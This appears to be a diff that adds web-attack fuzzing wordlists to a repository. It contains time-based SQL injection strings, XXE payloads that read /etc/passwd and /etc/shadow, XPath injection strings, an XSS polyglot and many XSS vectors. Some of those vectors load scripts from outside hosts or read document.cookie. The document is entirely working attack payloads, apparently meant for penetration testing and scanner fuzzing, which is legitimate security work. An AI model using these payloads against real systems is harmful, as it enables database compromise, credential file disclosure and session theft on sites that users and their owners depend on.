"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
|
@ -0,0 +1,18 @@
|
|||
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
|
@ -0,0 +1,45 @@
|
|||
and 0=benchmark(3000000,MD5(1))%20/*
|
||||
and 0=benchmark(3000000,MD5(1))%20--
|
||||
and 0=benchmark(3000000,MD5(1))%20%23
|
||||
' and 0=benchmark(3000000,MD5(1))%20/*
|
||||
' and 0=benchmark(3000000,MD5(1))%20--
|
||||
' and 0=benchmark(3000000,MD5(1))%20%23
|
||||
" and 0=benchmark(3000000,MD5(1))%20/*
|
||||
" and 0=benchmark(3000000,MD5(1))%20--
|
||||
" and 0=benchmark(3000000,MD5(1))%20%23
|
||||
) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
) and 0=benchmark(3000000,MD5(1))%20--
|
||||
) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
)) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
)) and 0=benchmark(3000000,MD5(1))%20--
|
||||
)) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
)))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
)))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
)))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
') and 0=benchmark(3000000,MD5(1))%20/*
|
||||
') and 0=benchmark(3000000,MD5(1))%20--
|
||||
') and 0=benchmark(3000000,MD5(1))%20%23
|
||||
") and 0=benchmark(3000000,MD5(1))%20/*
|
||||
") and 0=benchmark(3000000,MD5(1))%20--
|
||||
") and 0=benchmark(3000000,MD5(1))%20%23
|
||||
')) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
')) and 0=benchmark(3000000,MD5(1))%20--
|
||||
')) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
")) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
")) and 0=benchmark(3000000,MD5(1))%20--
|
||||
")) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
'))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
'))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
'))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
"))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
"))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
"))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
')))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
')))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
')))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
")))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
")))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
")))) and 0=benchmark(3000000,MD5(1))%20%23
|
66
attack/xml/xml-attacks.txt
Normal file
66
attack/xml/xml-attacks.txt
Normal file
|
@ -0,0 +1,66 @@
|
|||
-
|
||||
' or ''='
|
||||
' or '1'='1
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
||||
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
||||
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
$
|
||||
%
|
||||
'XoiZR
|
||||
<% Tnn96 %>
|
||||
<%= Tnn96 %>
|
||||
<? Tnn96 ?>
|
||||
<?Tnn96 ?>
|
||||
<Tnn96>
|
||||
"XoiZR
|
||||
(Tnn96)
|
||||
*
|
||||
*/*
|
||||
/
|
||||
//
|
||||
//*
|
||||
:
|
||||
;
|
||||
@
|
||||
@*
|
||||
[Tnn96]
|
||||
]>
|
||||
{{= Tnn96}}
|
||||
{{Tnn96}}
|
||||
{= Tnn96}
|
||||
{Tnn96}
|
||||
+
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
|
||||
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:/boot.ini">
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
||||
<name>','')); phpinfo(); exit;/*</name>
|
||||
0
|
||||
0.00005
|
||||
0.1
|
||||
0.9
|
||||
1
|
||||
-1
|
||||
1.7976931348623157e+308
|
||||
5e-10
|
||||
5e-324
|
||||
count(/child::node())
|
||||
false
|
||||
null
|
||||
true
|
||||
x' or 1=1 or 'x'='y
|
||||
x' or name()='username' or 'x'='y
|
13
attack/xpath/xpath-injection.txt
Normal file
13
attack/xpath/xpath-injection.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
' or '1'='1
|
||||
' or ''='
|
||||
x' or 1=1 or 'x'='y
|
||||
/
|
||||
//
|
||||
//*
|
||||
*/*
|
||||
@*
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
' and count(/*)=1 and '1'='1
|
||||
' and count(/@*)=1 and '1'='1
|
||||
' and count(/comment())=1 and '1'='1
|
32
attack/xss/XSSPolyglot.txt
Normal file
32
attack/xss/XSSPolyglot.txt
Normal file
|
@ -0,0 +1,32 @@
|
|||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
||||
/*-/*`/*\`/*'/*"/**/
|
||||
(/* */oNcliCk=alert() )
|
||||
//%0D%0A%0D%0A//
|
||||
</stYle/</titLe/</teXtarEa/</scRipt/--!>
|
||||
\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
||||
<input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>
|
||||
<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
|
||||
<img border=3 alt=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e>
|
||||
<a href="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e">click me</a>
|
||||
<math xlink:href="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e">click me</math>
|
||||
<iframe src="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"></iframe>
|
||||
<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
|
||||
<style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
|
||||
<textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
|
||||
<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
|
||||
var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
|
||||
var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e';
|
||||
<script>//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
|
||||
<script>/*jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
|
||||
</script><script src="https://static.jsbin.com/js/render/edit.js?3.35.11"></script><script>jsbinShowEdit && jsbinShowEdit({"static":"https://static.jsbin.com","root":"https://jsbin.com"});</script><script>
|
||||
setTimeout(location.search.slice(1));
|
||||
jaVasCript:/-/%60/%5C%60/'/%22//(/%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E
|
||||
var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.documentElement.innerHTML = data;
|
||||
var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.head.outerHTML = data;
|
||||
var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.write(data);document.close();
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
70
attack/xss/all-encodings-of-lt.txt
Normal file
70
attack/xss/all-encodings-of-lt.txt
Normal file
|
@ -0,0 +1,70 @@
|
|||
<
|
||||
%3C
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
\x3c
|
||||
\x3C
|
||||
\u003c
|
||||
\u003C
|
22
attack/xss/default-javascript-event-attributes.txt
Normal file
22
attack/xss/default-javascript-event-attributes.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
onAbort
|
||||
onBlur
|
||||
onChange
|
||||
onClick
|
||||
onDblClick
|
||||
onDragDrop
|
||||
onError
|
||||
onFocus
|
||||
onKeyDown
|
||||
onKeyPress
|
||||
onKeyUp
|
||||
onLoad
|
||||
onMouseDown
|
||||
onMouseMove
|
||||
onMouseOut
|
||||
onMouseOver
|
||||
onMouseUp
|
||||
onMove
|
||||
onReset
|
||||
onResize
|
||||
onSelect
|
||||
onSubmit
|
164
attack/xss/xss-other.txt
Normal file
164
attack/xss/xss-other.txt
Normal file
|
@ -0,0 +1,164 @@
|
|||
'
|
||||
<font style='color:expression(alert('XSS'))'>
|
||||
' onmouseover=alert(/Black.Spook/)
|
||||
' or 2=2
|
||||
"
|
||||
" or 202
|
||||
";eval(unescape(location))//# %0Aalert(0)
|
||||
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
"><iframe%20src="http://google.com"%%203E
|
||||
"><img src=x onerror=prompt(1);>
|
||||
"><img src=x onerror=window.open('https://www.google.com/');>
|
||||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||
alert(1)
|
||||
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||
&#39;&#88;&#83;&#83;&#39;&#41;>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<img src=x:x onerror=alert(1)>
|
||||
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
|
||||
<SCRIPT SRC=//xss.rocks/.j>
|
||||
'); alert('XSS
|
||||
\";alert('XSS');//
|
||||
<%<!--'%><script>alert(1);</script -->
|
||||
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
||||
<--`<img/src=` onerror=alert(1)> --!>
|
||||
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
||||
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
||||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
<a href="javascript:\u0061le%72t(1)"><button>
|
||||
<a href="jAvAsCrIpT:alert(1)">X</a>
|
||||
<a href=javascript:alert(document.cookie)>Click Here</a>
|
||||
<a onmouseover="alert(document.cookie)">xxs link</a>
|
||||
<a onmouseover=alert(document.cookie)>xxs link</a>
|
||||
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
<body onLoad="alert('XSS');"
|
||||
<body onunload="javascript:alert('XSS');">
|
||||
<body/onload=<!-->
alert(1)>
|
||||
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
|
||||
<div onmouseover='alert(1)'>DIV</div>
|
||||
<div/onmouseover='alert(1)'> style="x:">
|
||||
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
|
||||
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
|
||||
<form><button formaction=javascript:alert(1)>CLICKME
|
||||
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
|
||||
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
|
||||
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
|
||||
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||
<iframe src=http://xss.rocks/scriptlet.html <
|
||||
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
||||
